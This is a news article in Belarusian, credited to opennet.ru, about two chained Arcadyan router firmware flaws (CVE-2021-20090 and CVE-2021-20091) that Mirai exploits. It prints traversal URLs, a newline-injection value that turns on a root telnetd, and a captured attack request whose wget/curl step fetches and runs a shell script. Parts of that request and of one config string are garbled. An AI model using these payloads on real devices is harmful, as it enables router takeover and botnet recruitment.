У сетцы зафіксавана масавая атака на хатнія маршрутызатары, у прашыўках якіх выкарыстоўваецца рэалізацыя http-сервера ад кампаніі Arcadyan. Для атрымання кіравання над прыладамі прымяняецца спалучэнне двух уразлівасцяў, якія дазваляюць выдалена выканаць адвольны код з правамі root. Праблема закранае дастаткова вялікі спектр ADSL-маршрутызатараў ад кампаній Arcadyan, ASUS і Buffalo, а таксама прылад, якія пастаўляюцца пад брэндамі Білайн (праблема пацверджана ў Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone і іншых аператараў сувязі. Адзначаецца, што праблема прысутнічае ў прашыўках Arcadyan ужо больш за 10 гадоў і за гэты час паспела перавандраваць як мінімум у 20 мадэляў прылад ад 17 розных вытворцаў.
Першая ўразлівасць CVE-2021-20090 дае магчымасць звярнуцца да любога скрыпту web-інтэрфейсу без праходжання аўтэнтыфікацыі. Сутнасць уразлівасць у тым, што ў web-інтэрфейсе некаторыя каталогі, праз якія аддаюцца карцінкі, CSS-файлы і сцэнары JavaScript, даступныя без аўтэнтыфікацыі. Пры гэтым праверка каталогаў, для якіх дазволены доступ без аўтэнтыфікацыі выконваецца па пачатковай масцы. Указанне ў шляхах сімвалаў «../» для пераходу ў бацькоўскі каталог блакуецца прашыўкай, але выкарыстанне камбінацыі «..%2f» прапускаецца. Такім чынам, ёсць магчымасць адкрыцця абароненых старонак пры адпраўцы запытаў, падобных "http://192.168.1.1/images/..%2findex.htm".
Другая ўразлівасць CVE-2021-20091 дазваляе аўтэнтыфікаванаму карыстачу занесці змены ў сістэмныя налады прылады праз адпраўку спецыяльна аформленых параметраў скрыпту apply_abstract.cgi, які не ажыццяўляе праверку наяўнасці знака перакладу радка ў параметрах. Напрыклад, атакавалы можа пры выкананні аперацыі ping паказаць у поле з правяраным IP-адрасам значэнне "192.168.1.2%0AARC_SYS_TelnetdEnable=1" і скрыпт пры стварэнні файла з наладамі /tmp/etc/config/.glbcfg запіша ў яго радок "AARC_SYS », якая актывуе сервер telnetd, які прадстаўляе неабмежаваны доступ у камандную абалонку з правамі root. Аналагічна з дапамогай усталёўкі параметру AARC_SYS можна выканаць любы код у сістэме. Першая ўразлівасць дае магчымасць запусціць праблемны скрыпт без аўтэнітыфікацыі, звярнуўшыся да яго як "/images/..%1fapply_abstract.cgi".
Для эксплуатацыі ўразлівасцяў у атакавалага павінна быць магчымасць адпраўкі запыту на сеткавы порт, на якім выконваецца web-інтэрфейс. Судзячы па дынаміцы распаўсюджвання нападу шматлікія аператары пакідаюць на сваіх прыладах доступ з вонкавай сеткі для спрашчэння дыягностыкі праблем службай падтрымкі. Пры абмежаванні доступу да інтэрфейсу толькі для ўнутранай сеткі напад можа быць здзейснена з вонкавай сеткі пры дапамозе тэхнікі "DNS rebinding". Уразлівасці ўжо актыўна выкарыстоўваюцца для падлучэння маршрутызатараў да ботнета Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark 3A ARC_SYS_TelnetdEnable=5& %212.192.241.7AARC_SYS_=cd+/tmp; wget+http://0/lolol.sh; curl+-O+http://1/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=212.192.241.72&TMP_Ping_Type=212.192.241.72
Крыніца: opennet.ru